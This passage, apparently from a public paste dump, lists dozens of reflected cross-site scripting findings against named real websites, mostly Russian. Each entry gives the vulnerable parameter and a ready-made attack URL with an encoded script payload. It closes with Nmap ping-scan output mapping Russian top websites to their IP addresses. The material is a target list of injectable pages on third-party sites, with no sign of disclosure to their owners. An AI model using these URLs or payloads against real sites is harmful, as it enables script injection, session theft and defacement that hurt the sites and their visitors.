  2744. Vulnerability URL: http://www.docdvd.ru/deatail.php?id_kino=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&pw=%241%24nHu6EWwy%24YRYXDLAGBA2coebuocrc0
  2745.  
  2746.  
  2747. Type: XSS
  2748. Protocol: http
  2749. Verb: get
  2750. Parameter: categoryID
  2751. Vulnerability URL: http://www.dom-zdorovja.ru/categorylist.php?categoryID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2752.  
  2753.  
  2754. Type: XSS
  2755. Protocol: http
  2756. Verb: get
  2757. Parameter: id
  2758. Vulnerability URL: http://www.domnaru.ru/rss.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2759.  
  2760.  
  2761. Type: XSS
  2762. Protocol: http
  2763. Verb: get
  2764. Parameter: tid
  2765. Vulnerability URL: http://www.doska.gold-fond.ru/?tid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2766.  
  2767.  
  2768. Type: XSS
  2769. Protocol: http
  2770. Verb: get
  2771. Parameter: gor
  2772. Vulnerability URL: http://www.doska.stroyart.ru/informer_1.php?c=1&cat=16&gor=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&vg=g
  2773.  
  2774.  
  2775. Type: XSS
  2776. Protocol: http
  2777. Verb: get
  2778. Parameter: cat
  2779. Vulnerability URL: http://www.doska.stroyart.ru/informer_1.php?c=1&cat=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&gor=27&vg=g
  2780.  
  2781.  
  2782. Type: XSS
  2783. Protocol: http
  2784. Verb: get
  2785. Parameter: aspxerrorpath
  2786. Vulnerability URL: http://www.etwinternational.ru/Default.aspx?aspxerrorpath=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2787.  
  2788.  
  2789. Type: XSS
  2790. Protocol: http
  2791. Verb: get
  2792. Parameter: searchkeyword
  2793. Vulnerability URL: http://www.etwinternational.ru/productslist.aspx?searchkeyword=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2794.  
  2795.  
  2796. Type: XSS
  2797. Protocol: http
  2798. Verb: get
  2799. Parameter: regmode
  2800. Vulnerability URL: http://www.governors.ru/?razdel=main&region=30&regmode=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&statja=59130
  2801.  
  2802.  
  2803. Type: XSS
  2804. Protocol: http
  2805. Verb: get
  2806. Parameter: razdel
  2807. Vulnerability URL: http://www.governors.ru/?razdel=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&region=30&regmode=regions&statja=59130
  2808.  
  2809.  
  2810. Type: XSS
  2811. Protocol: http
  2812. Verb: get
  2813. Parameter: article_id
  2814. Vulnerability URL: http://www.grandprix-magazine.ru/index.php?action=magazine_archive&article_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2815.  
  2816.  
  2817. Type: XSS
  2818. Protocol: http
  2819. Verb: get
  2820. Parameter: theme_id
  2821. Vulnerability URL: http://www.hrmonitor.ru/index.php?theme_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&pname=news&p=1
  2822.  
  2823.  
  2824. Type: XSS
  2825. Protocol: http
  2826. Verb: get
  2827. Parameter: pageID
  2828. Vulnerability URL: http://www.intimsshop.ru/?pageID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2829.  
  2830.  
  2831. Type: XSS
  2832. Protocol: http
  2833. Verb: get
  2834. Parameter: id
  2835. Vulnerability URL: http://www.isras.ru/publ.html?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2836.  
  2837.  
  2838. Type: XSS
  2839. Protocol: http
  2840. Verb: get
  2841. Parameter: cat_id
  2842. Vulnerability URL: http://www.istok-m.ru/catalog?cat_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&act=list
  2843.  
  2844.  
  2845. Type: XSS
  2846. Protocol: http
  2847. Verb: get
  2848. Parameter: qnum
  2849. Vulnerability URL: http://www.itest.ru/keirsey.php?question=0&qnum=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2850.  
  2851.  
  2852. Type: XSS
  2853. Protocol: http
  2854. Verb: get
  2855. Parameter: question
  2856. Vulnerability URL: http://www.itest.ru/keirsey.php?question=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&qnum=1
  2857.  
  2858.  
  2859. Type: XSS
  2860. Protocol: http
  2861. Verb: get
  2862. Parameter: productID
  2863. Vulnerability URL: http://www.kofi.ru/index.php?productID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2864.  
  2865.  
  2866. Type: XSS
  2867. Protocol: http
  2868. Verb: get
  2869. Parameter: k
  2870. Vulnerability URL: http://www.linkinform.ru/file.php?k=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2871.  
  2872.  
  2873. Type: XSS
  2874. Protocol: http
  2875. Verb: get
  2876. Parameter: com
  2877. Vulnerability URL: http://www.madcms.ru/?action=all&com=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&cat=1
  2878.  
  2879.  
  2880. Type: XSS
  2881. Protocol: http
  2882. Verb: get
  2883. Parameter: menu_id
  2884. Vulnerability URL: http://www.magotboga.ru/index.php?menu_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2885.  
  2886.  
  2887. Type: XSS
  2888. Protocol: http
  2889. Verb: get
  2890. Parameter: path
  2891. Vulnerability URL: http://www.master-key.ru/index.php?path=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&mod=page
  2892.  
  2893.  
  2894. Type: XSS
  2895. Protocol: http
  2896. Verb: get
  2897. Parameter: cat_s_id
  2898. Vulnerability URL: http://www.mebelofitaly.ru/?s_id=2821&cat_s_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2899.  
  2900.  
  2901. Type: XSS
  2902. Protocol: http
  2903. Verb: get
  2904. Parameter: id
  2905. Vulnerability URL: http://www.medy.ru/pages.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2906.  
  2907.  
  2908. Type: XSS
  2909. Protocol: http
  2910. Verb: get
  2911. Parameter: products_id
  2912. Vulnerability URL: http://www.megaprosto.ru/?products_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2913.  
  2914.  
  2915. Type: XSS
  2916. Protocol: http
  2917. Verb: get
  2918. Parameter: nav
  2919. Vulnerability URL: http://www.messervice.ru/main.php?nav=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2920.  
  2921.  
  2922. Type: XSS
  2923. Protocol: http
  2924. Verb: get
  2925. Parameter: id
  2926. Vulnerability URL: http://www.mosteh.ru/?model=Miele+S+716&com=model&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2927.  
  2928.  
  2929. Type: XSS
  2930. Protocol: http
  2931. Verb: get
  2932. Parameter: path
  2933. Vulnerability URL: http://www.mp3cd.ru/page.php?shop=in&path=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&element_id=4985
  2934.  
  2935.  
  2936. Type: XSS
  2937. Protocol: http
  2938. Verb: get
  2939. Parameter: element_id
  2940. Vulnerability URL: http://www.mp3cd.ru/page.php?shop=in&path=catalog&element_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2941.  
  2942.  
  2943. Type: XSS
  2944. Protocol: http
  2945. Verb: get
  2946. Parameter: id
  2947. Vulnerability URL: http://www.mrdc.ru/homepage_rus.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2948.  
  2949.  
  2950. Type: XSS
  2951. Protocol: http
  2952. Verb: get
  2953. Parameter: sid
  2954. Vulnerability URL: http://www.newkurkino.ru/modules.php?sid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&name=News&file=article&op=modload
  2955.  
  2956.  
  2957. Type: XSS
  2958. Protocol: http
  2959. Verb: get
  2960. Parameter: gallery
  2961. Vulnerability URL: http://www.niidokuchaeva.ru/?p=6&gallery=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2962.  
  2963.  
  2964. Type: XSS
  2965. Protocol: http
  2966. Verb: get
  2967. Parameter: id
  2968. Vulnerability URL: http://www.nota-bene.ru/statpage.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2969.  
  2970.  
  2971. Type: XSS
  2972. Protocol: http
  2973. Verb: get
  2974. Parameter: id
  2975. Vulnerability URL: http://www.nota-plus.ru/?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&act=product
  2976.  
  2977.  
  2978. Type: XSS
  2979. Protocol: http
  2980. Verb: get
  2981. Parameter: lang
  2982. Vulnerability URL: http://www.nrmed.ru/index.php?lang=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&link=contactsfilial-barklaya
  2983.  
  2984.  
  2985. Type: XSS
  2986. Protocol: http
  2987. Verb: get
  2988. Parameter: language
  2989. Vulnerability URL: http://www.nva-korenevo.ru/index.php?part=main&language=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2990.  
  2991.  
  2992. Type: XSS
  2993. Protocol: http
  2994. Verb: get
  2995. Parameter: gid
  2996. Vulnerability URL: http://www.offpoly.ru/shop?gid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  2997.  
  2998.  
  2999. Type: XSS
  3000. Protocol: http
  3001. Verb: get
  3002. Parameter: sect_id
  3003. Vulnerability URL: http://www.olimpciti.ru/catalog?sect_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3004.  
  3005.  
  3006. Type: XSS
  3007. Protocol: http
  3008. Verb: get
  3009. Parameter: idparfum
  3010. Vulnerability URL: http://www.parfumprestige.ru/man.phtml?idparfum=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&letter=G&iddesigner=46
  3011.  
  3012.  
  3013. Type: XSS
  3014. Protocol: http
  3015. Verb: get
  3016. Parameter: n
  3017. Vulnerability URL: http://www.permoboz.ru/news0.php?n=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3018.  
  3019.  
  3020. Type: XSS
  3021. Protocol: http
  3022. Verb: get
  3023. Parameter: pid
  3024. Vulnerability URL: http://www.portal-odincovo.ru/articles.php?pid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3025.  
  3026.  
  3027. Type: XSS
  3028. Protocol: http
  3029. Verb: get
  3030. Parameter: id
  3031. Vulnerability URL: http://www.postbook.ru/detail.php?currKey=fX5nWWoAuuKxm2ZYZwKXGL4W&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3032.  
  3033.  
  3034. Type: XSS
  3035. Protocol: http
  3036. Verb: get
  3037. Parameter: products_id
  3038. Vulnerability URL: http://www.priceguru.ru/product_info.php?cPath=68_207&products_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3039.  
  3040.  
  3041. Type: XSS
  3042. Protocol: http
  3043. Verb: get
  3044. Parameter: id
  3045. Vulnerability URL: http://www.ramu.ru/news-details.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3046.  
  3047.  
  3048. Type: XSS
  3049. Protocol: http
  3050. Verb: get
  3051. Parameter: id
  3052. Vulnerability URL: http://www.ria-arbitr.ru/moscow.htm?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3053.  
  3054.  
  3055. Type: XSS
  3056. Protocol: http
  3057. Verb: get
  3058. Parameter: id
  3059. Vulnerability URL: http://www.rosalcohol.ru/site.php?table=bmV3c19nbGF2&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3060.  
  3061.  
  3062. Type: XSS
  3063. Protocol: http
  3064. Verb: get
  3065. Parameter: tab
  3066. Vulnerability URL: http://www.rsm-ural.ru/full.php?id=124&tab=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3067.  
  3068.  
  3069. Type: XSS
  3070. Protocol: http
  3071. Verb: get
  3072. Parameter: t
  3073. Vulnerability URL: http://www.rueckenschnellhelfer.de/?t=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&id=6
  3074.  
  3075.  
  3076. Type: XSS
  3077. Protocol: http
  3078. Verb: get
  3079. Parameter: disp
  3080. Vulnerability URL: http://www.rugbyweb.de/index.php?disp=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3081.  
  3082.  
  3083. Type: XSS
  3084. Protocol: http
  3085. Verb: get
  3086. Parameter: h
  3087. Vulnerability URL: http://www.sale.volgograd.ru/index.php?h=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&vm=1&act=announview
  3088.  
  3089.  
  3090. Type: XSS
  3091. Protocol: http
  3092. Verb: get
  3093. Parameter: vm
  3094. Vulnerability URL: http://www.sale.volgograd.ru/index.php?h=4&vm=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&act=announview
  3095.  
  3096.  
  3097. Type: XSS
  3098. Protocol: http
  3099. Verb: get
  3100. Parameter: id
  3101. Vulnerability URL: http://www.santeh-servis.ru/?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&module=articles
  3102.  
  3103.  
  3104. Type: XSS
  3105. Protocol: http
  3106. Verb: get
  3107. Parameter: country_id
  3108. Vulnerability URL: http://www.ski-tours.ru/index.php?country_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&act=offer_list
  3109.  
  3110.  
  3111. Type: XSS
  3112. Protocol: http
  3113. Verb: get
  3114. Parameter: id_refer
  3115. Vulnerability URL: http://www.softsnab.ru/?id_refer=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3116.  
  3117.  
  3118. Type: XSS
  3119. Protocol: http
  3120. Verb: get
  3121. Parameter: pg
  3122. Vulnerability URL: http://www.ssteh.ru/index.php?pg=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3123.  
  3124.  
  3125. Type: XSS
  3126. Protocol: http
  3127. Verb: get
  3128. Parameter: group
  3129. Vulnerability URL: http://www.sweettoys.ru/index?group=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3130.  
  3131.  
  3132. Type: XSS
  3133. Protocol: http
  3134. Verb: get
  3135. Parameter: page_id
  3136. Vulnerability URL: http://www.t-lc.ru/index.php?page_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3137.  
  3138.  
  3139. Type: XSS
  3140. Protocol: http
  3141. Verb: get
  3142. Parameter: id_country
  3143. Vulnerability URL: http://www.tbmos.ru/i3.asp?id_country=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3144.  
  3145.  
  3146. Type: XSS
  3147. Protocol: http
  3148. Verb: get
  3149. Parameter: menu_id
  3150. Vulnerability URL: http://www.tehenergoholding.ru/index.php?menu_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&menu_parent_id=0
  3151.  
  3152.  
  3153. Type: XSS
  3154. Protocol: http
  3155. Verb: get
  3156. Parameter: id
  3157. Vulnerability URL: http://www.telehit.ru/article_cat.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3158.  
  3159.  
  3160. Type: XSS
  3161. Protocol: http
  3162. Verb: get
  3163. Parameter: country_sel[]
  3164. Vulnerability URL: http://www.travel-bus.ru/search.php?type_search=country&country_sel%5B%5D=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&order=price_up
  3165.  
  3166.  
  3167. Type: XSS
  3168. Protocol: http
  3169. Verb: get
  3170. Parameter: id
  3171. Vulnerability URL: http://www.uph.ur.ru/inner.php?top=100001&page=journal2&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3172.  
  3173.  
  3174. Type: XSS
  3175. Protocol: http
  3176. Verb: get
  3177. Parameter: id
  3178. Vulnerability URL: http://www.urt.ru/index.php?Itemid=82&lang=ru&option=com_content&catid=62&id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&view=article
  3179.  
  3180.  
  3181. Type: XSS
  3182. Protocol: http
  3183. Verb: get
  3184. Parameter: id_exhibition
  3185. Vulnerability URL: http://www.v-expo.ru/exponents.php?id_exhibition=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3186.  
  3187.  
  3188. Type: XSS
  3189. Protocol: http
  3190. Verb: get
  3191. Parameter: menu_id
  3192. Vulnerability URL: http://www.vetdrug.ru/index.php?menu_id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&menu_parent_id=57
  3193.  
  3194.  
  3195. Type: XSS
  3196. Protocol: http
  3197. Verb: get
  3198. Parameter: id_tov
  3199. Vulnerability URL: http://www.videocam.spb.ru/show_tov.php?id_tov=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3200.  
  3201.  
  3202. Type: XSS
  3203. Protocol: http
  3204. Verb: get
  3205. Parameter: mid
  3206. Vulnerability URL: http://zverodrom.ru/?mid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E
  3207.  
  3208.  
  3209.  
  3210.  
  3211.  
  3212. ****------------------------------------****
  3213. *** RUSSIAN ALEXA TOP WEBSITES NMAP PING ***
  3214. ****------------------------------------****
  3215.  
  3216. Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-26 23:37 EET
  3217. Initiating Ping Scan at 23:37
  3218. Scanning 98 hosts [4 ports/host]
  3219. Completed Ping Scan at ****, 2.44s elapsed (98 total hosts)
  3220. Initiating Parallel DNS resolution of 98 hosts. at 23:37
  3221. Completed Parallel DNS resolution of 98 hosts. at 23:37, 13.38s elapsed
  3222. Initiating System CNAME DNS resolution of 2 hosts. at 23:37
  3223. Completed System CNAME DNS resolution of 2 hosts. at 23:37, 0.10s elapsed
  3224.  
  3225. Yandex.ru (77.88.55.55)Other addresses for Yandex.ru (not scanned): 5.255.255.55 5.255.255.5 77.88.55.66
  3226. rDNS record for 77.88.55.55: yandex.ru
  3227.  
  3228. Vk.com (87.240.131.99)Other addresses for Vk.com (not scanned): 87.240.143.241 87.240.131.97
  3229. rDNS record for 87.240.131.99: srv99-131-240-87.vk.com
  3230.  
  3231. Google.ru (216.58.209.3)
  3232. rDNS record for 216.58.209.3: sof01s12-in-f3.1e100.net
  3233.  
  3234. Youtube.com (216.58.209.14)
  3235. rDNS record for 216.58.209.14: sof01s12-in-f14.1e100.net
  3236.  
  3237. Mail.ru (94.100.180.200)Other addresses for Mail.ru (not scanned): 217.69.139.200 94.100.180.202 217.69.139.202
  3238. rDNS record for 94.100.180.200: cp.mail.ru
  3239.  
  3240. Google.com (216.58.209.174)
  3241. rDNS record for 216.58.209.174: bud02s21-in-f14.1e100.net
  3242.  
  3243.  
  3244. Ok.ru (217.20.147.94)
  3245. Other addresses for Ok.ru (not scanned): 217.20.155.58 217.20.156.159
  3246. rDNS record for 217.20.147.94: ip94.147.odnoklassniki.ru
  3247.  
  3248.  
  3249. Aliexpress.com (205.204.101.160)
  3250. Other addresses for Aliexpress.com (not scanned): 198.11.132.43
  3251.  
  3252.  
  3253. Avito.ru (185.89.12.52)
  3254.  
  3255.  
  3256.  
  3257. Wikipedia.org (208.80.154.224)
  3258. rDNS record for 208.80.154.224: text-lb.eqiad.wikimedia.org
  3259.  
  3260.  
  3261. Rambler.ru (81.19.70.3)
  3262. rDNS record for 81.19.70.3: rambler.ru
  3263.  
  3264.  
  3265. Livejournal.com (208.93.0.150)
  3266. rDNS record for 208.93.0.150: www.livejournal.com
  3267.  
  3268.  
  3269. Sberbank.ru (194.54.14.159)
  3270.  
  3271.  
  3272.  
  3273. Rutracker.org (195.82.146.214)
  3274. rDNS record for 195.82.146.214: rutracker.org
  3275.  
  3276.  
  3277. Rbc.ru (80.68.251.74)
  3278. Other addresses for Rbc.ru (not scanned): 185.72.231.14
  3279. rDNS record for 80.68.251.74: rtmp-mf-mrr04.video.rbc.ru
  3280.  
  3281.  
  3282. Liveinternet.ru (88.212.196.88)
  3283. Other addresses for Liveinternet.ru (not scanned): 88.212.196.114 88.212.196.87
  3284. rDNS record for 88.212.196.88: host48.rax.ru
  3285.  
  3286.  
  3287. Bongacams.com (64.210.142.13) [host down]
  3288.  
  3289. Instagram.com (54.88.91.235)
  3290. Other addresses for Instagram.com (not scanned): 52.20.91.133 107.21.4.179 54.175.239.129 54.84.172.209 54.86.239.205 52.0.227.212 52.4.158.66
  3291. rDNS record for 54.88.91.235: ec2-54-88-91-235.compute-1.amazonaws.com
  3292.  
  3293. Ebay.com (66.211.160.86)
  3294. Other addresses for Ebay.com (not scanned): 66.211.160.87 66.135.216.190
  3295. rDNS record for 66.211.160.86: ebay.com
  3296.  
  3297. Kinopoisk.ru (87.250.251.105)
  3298. Other addresses for Kinopoisk.ru (not scanned): 213.180.193.105
  3299. rDNS record for 87.250.251.105: front.kp.yandex.net
  3300.  
  3301. Lenta.ru (81.19.76.9)
  3302. Other addresses for Lenta.ru (not scanned): 81.19.76.10 81.19.76.11 81.19.76.8
  3303. rDNS record for 81.19.76.9: www.lenta.ru
  3304.  
  3305. Kinogo.co (104.20.35.56)
  3306. Other addresses for Kinogo.co (not scanned): 104.20.36.56
  3307.  
  3308. Gismeteo.ru (212.24.42.230)
  3309.  
  3310.  
  3311. Eldorado.ru (178.248.235.20)
  3312.  
  3313.  
  3314. Sbrf.ru (194.54.14.129)
  3315. rDNS record for 194.54.14.129: csgw1-ctx2-v2.pvbsbrf.ru
  3316.  
  3317. Superjob.ru (91.206.147.85)
  3318. rDNS record for 91.206.147.85: front02.superjob.ru
  3319.  
  3320. Gosuslugi.ru (109.207.1.97)
  3321. rDNS record for 109.207.1.97: gosuslugi.ru
  3322.  
  3323. Livemaster.ru (89.108.109.102)
  3324. rDNS record for 89.108.109.102: u10654.col.agava.net
  3325.  
  3326. Kinozal.tv (104.24.106.53)
  3327. Other addresses for Kinozal.tv (not scanned): 104.24.107.53
  3328.  
  3329. Vz.ru (83.222.2.212)
  3330. Other addresses for Vz.ru (not scanned): 217.16.28.217
  3331. rDNS record for 83.222.2.212: dni.ru
  3332.  
  3333. Sports.ru (37.209.240.1)
  3334.  
  3335.  
  3336. Booking.com (5.57.16.220)
  3337. rDNS record for 5.57.16.220: www.booking.com
  3338.  
  3339. Ntv.ru (195.46.176.103)
  3340. rDNS record for 195.46.176.103: relay.media.ntv.ru
  3341.  
  3342. Exist.ru (89.249.27.132)
  3343.  
  3344.  
  3345. Github.com (192.30.252.128)
  3346. rDNS record for 192.30.252.128: github.com
  3347.  
  3348. Megafon.ru (85.26.148.161)
  3349. rDNS record for 85.26.148.161: clients-85.26.148.161.misp.ru
  3350.  
  3351. Irecommend.ru (186.2.163.28)
  3352. rDNS record for 186.2.163.28: ddos-guard.net
  3353.  
  3354. Sape.ru (193.232.121.61)
  3355. Other addresses for Sape.ru (not scanned): 193.232.121.11
  3356.  
  3357. Qiwi.com (91.232.230.50)
  3358.  
  3359.  
  3360. Fastpic.ru (85.112.114.245)
  3361. Other addresses for Fastpic.ru (not scanned): 85.112.114.244
  3362. rDNS record for 85.112.114.245: fastpic.ihome.ru
  3363.  
  3364. Aif.ru (130.193.65.60)
  3365.  
  3366.  
  3367. Searchengines.guru (104.20.58.56)
  3368. Other addresses for Searchengines.guru (not scanned): 104.20.57.56
  3369.  
  3370. Steamcommunity.com (23.221.192.100)
  3371. rDNS record for 23.221.192.100: a23-221-192-100.deploy.static.akamaitechnologies.com
  3372.  
  3373. E1.ru (212.193.163.6)
  3374. Other addresses for E1.ru (not scanned): 212.193.163.7
  3375. rDNS record for 212.193.163.6: e1.ru
  3376.  
  3377. Labirint.ru (194.84.83.154)
  3378. Other addresses for Labirint.ru (not scanned): 194.84.83.148
  3379.  
  3380. Subscribe.ru (81.9.34.191)
  3381. Other addresses for Subscribe.ru (not scanned): 81.9.34.190
  3382. rDNS record for 81.9.34.191: cat191.subscribe.ru
  3383.  
  3384. Ivi.ru (91.233.219.155)
  3385. Other addresses for Ivi.ru (not scanned): 91.233.219.154
  3386.  
  3387. Msn.com (23.101.196.141)
  3388.  
  3389.  
  3390. Ria.ru (178.248.233.32)
  3391.  
  3392.  
  3393. Amazon.com (176.32.98.166)
  3394. Other addresses for Amazon.com (not scanned): 205.251.242.54 176.32.103.205
  3395.  
  3396. Drom.ru (185.44.0.15)
  3397. Other addresses for Drom.ru (not scanned): 185.44.0.25 185.44.0.35
  3398.  
  3399. Blogspot.ru (216.58.211.41)
  3400. rDNS record for 216.58.211.41: muc03s14-in-f9.1e100.net
  3401.  
  3402. Hh.ru (94.124.200.86)
  3403. rDNS record for 94.124.200.86: hh.ru
  3404.  
  3405. Yahoo.com (98.138.253.109)
  3406. Other addresses for Yahoo.com (not scanned): 206.190.36.45 98.139.183.24
  3407. rDNS record for 98.138.253.109: ir1.fp.vip.ne1.yahoo.com
  3408.  
  3409. Auto.ru (217.107.214.5)
  3410. Other addresses for Auto.ru (not scanned): 217.107.214.2
  3411.  
  3412. Vk.me (87.240.131.120)
  3413. Other addresses for Vk.me (not scanned): 87.240.131.118 87.240.131.119
  3414. rDNS record for 87.240.131.120: srv120-131-240-87.vk.com
  3415.  
  3416. Yaplakal.com (5.187.1.122)
  3417. rDNS record for 5.187.1.122: dsde448-2.fornex.org
  3418.  
  3419. Ozon.ru (185.73.192.4)
  3420.  
  3421.  
  3422. Vulkan.site (188.164.255.67)
  3423. rDNS record for 188.164.255.67: v-6-08-26-d4509-67.webazilla.com
  3424.  
  3425. Yadi.sk (213.180.193.50)
  3426. rDNS record for 213.180.193.50: front.disk.yandex.ru
  3427.  
  3428. 2gis.ru (91.236.51.74)
  3429. rDNS record for 91.236.51.74: node51-74.2gis.com
  3430.  
  3431. Onclickads.net (88.85.82.172)
  3432. Other addresses for Onclickads.net (not scanned): 78.140.191.70 78.140.191.110 78.140.191.109 78.140.191.89 78.140.191.90 78.140.191.69 78.140.191.80 88.85.82.171
  3433.  
  3434. 4pda.ru (104.20.9.191)
  3435. Other addresses for 4pda.ru (not scanned): 104.20.8.191
  3436.  
  3437. Pinterest.com (23.235.37.84)
  3438. Other addresses for Pinterest.com (not scanned): 104.156.85.84 23.235.33.84 104.156.81.84
  3439.  
  3440. Echo.msk.ru (190.115.28.10)
  3441. rDNS record for 190.115.28.10: ddos-guard.net
  3442.  
  3443. Vesti.ru (80.247.32.206)
  3444. rDNS record for 80.247.32.206: front-farm-4.rfn.ru
  3445.  
  3446. Fishki.net (195.208.220.37)
  3447. Other addresses for Fishki.net (not scanned): 217.29.55.13
  3448. rDNS record for 195.208.220.37: fishki.net
  3449.  
  3450. Ulmart.ru (178.248.236.28)
  3451.  
  3452.  
  3453. Drive2.ru (146.255.192.77)
  3454.  
  3455.  
  3456. Mts.ru (91.216.147.50)
  3457.  
  3458.  
  3459. Gazeta.ru (81.19.72.0)
  3460. Other addresses for Gazeta.ru (not scanned): 81.19.72.1 81.19.72.2 81.19.72.3
  3461. rDNS record for 81.19.72.0: gazeta.ru
  3462.  
  3463. T.co (104.244.42.5)
  3464. Other addresses for T.co (not scanned): 104.244.42.69 104.244.42.133 104.244.42.197
  3465.  
  3466. Lifenews.ru (91.229.112.200)
  3467. Other addresses for Lifenews.ru (not scanned): 91.229.112.201
  3468.  
  3469. Webmoney.ru (88.198.43.118)
  3470. Other addresses for Webmoney.ru (not scanned): 62.210.115.140 37.187.104.199
  3471. rDNS record for 88.198.43.118: static.88-198-43-118.clients.your-server.de
  3472.  
  3473. Mos.ru (87.245.154.175)
  3474. Other addresses for Mos.ru (not scanned): 87.245.154.176
  3475.  
  3476. Paypal.com (66.211.169.3)
  3477. Other addresses for Paypal.com (not scanned): 66.211.169.66
  3478.  
  3479. Live.com (65.55.206.154)
  3480.  
  3481.  
  3482. Beeline.ru (217.118.87.98)
  3483.  
  3484.  
  3485. Mirtesen.ru (95.131.27.118)
  3486. Other addresses for Mirtesen.ru (not scanned): 95.131.27.119
  3487.  
  3488. Alfabank.ru (195.218.200.139)
  3489. rDNS record for 195.218.200.139: hosting.design.ru
  3490.  
  3491. Citilink.ru (178.248.234.66)
  3492.  
  3493.  
  3494. Am15.net (95.213.148.50)
  3495. Other addresses for Am15.net (not scanned): 95.213.148.51 95.213.148.52 95.213.148.54 95.213.156.90 95.213.156.91 95.213.156.92 148.251.0.175 148.251.3.49 148.251.8.171 148.251.11.11 148.251.11.44 148.251.47.213 148.251.181.234 148.251.181.235 78.46.80.131 95.213.144.75 95.213.144.76
  3496.  
  3497. Bing.com (204.79.197.200)
  3498. rDNS record for 204.79.197.200: a-0001.a-msedge.net
  3499.  
  3500. Worldoftanks.ru (92.223.21.73)
  3501. rDNS record for 92.223.21.73: ed-sl-b73.worldoftanks.eu
  3502.  
  3503. Tiu.ru (146.255.194.83)
  3504.  
  3505.  
  3506. Wix.com (199.83.134.92)
  3507. Other addresses for Wix.com (not scanned): 192.230.66.92
  3508. rDNS record for 199.83.134.92: 199.83.134.92.ip.incapdns.net
